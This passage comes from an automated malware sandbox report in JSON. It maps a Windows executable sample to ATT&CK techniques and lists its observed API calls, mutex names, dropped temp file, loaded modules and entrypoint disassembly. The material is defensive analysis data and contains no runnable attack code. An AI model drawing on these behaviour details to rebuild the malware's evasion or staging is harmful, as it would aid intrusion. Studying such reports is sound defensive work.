"suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004064)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002924)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e076d@ADVAPI32.dll\"\n \"0e000f00703f076d@ADVAPI32.dll\"\n \"0e000f00cc3f076d@ADVAPI32.dll\"\n \"11001200b447076d@ADVAPI32.dll\"\n \"110012004848076d@ADVAPI32.dll\"\n \"120013008c48076d@ADVAPI32.dll\"\n \"12001300e448076d@ADVAPI32.dll\"\n \"14001500386e076d@ADVAPI32.dll\"\n \"14001500506e076d@ADVAPI32.dll\"\n \"14001500686e076d@ADVAPI32.dll\"\n \"17001800806e076d@ADVAPI32.dll\"\n \"0d000e00986e076d@ADVAPI32.dll\"\n \"11001200a86e076d@ADVAPI32.dll\"\n \"11001200bc6e076d@ADVAPI32.dll\"\n \"0d000e004466076d@WININET.dll\"\n \"0d000e00b466076d@WININET.dll\"\n \"10001100ec66076d@WININET.dll\"\n \"100011009067076d@WININET.dll\"\n \"10001100006f076d@WININET.dll\"\n \"10001100146f076d@WININET.dll\"\n \"14001500286f076d@WININET.dll\"\n \"14001500406f076d@WININET.dll\"\n \"12001300586f076d@WININET.dll\"\n \"120013006c6f076d@WININET.dll\"\n \"10001100d067076d@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"CreateProcessW\" with parameter \":*C:\\6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe *\" - (UID: 00000000-00004064)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZXVXZG\" - (UID: 00000000-00002420)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" has an writable section named \".data\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" has an writable section named \".bss\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" has an writable section named \".idata\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" has an writable section named \".CRT\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" has an writable section named \".tls\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71030000\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" loaded module \"KERNEL32\" at base 76d90000\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d7d0000\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75950000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71030000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"KERNEL32\" at base 76d90000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d7d0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75950000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 757e0000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 76e70000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 76f50000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 75ab0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 720d0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75ad0000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 76a90000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004064)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00002420)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002420)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" failed to load missing module 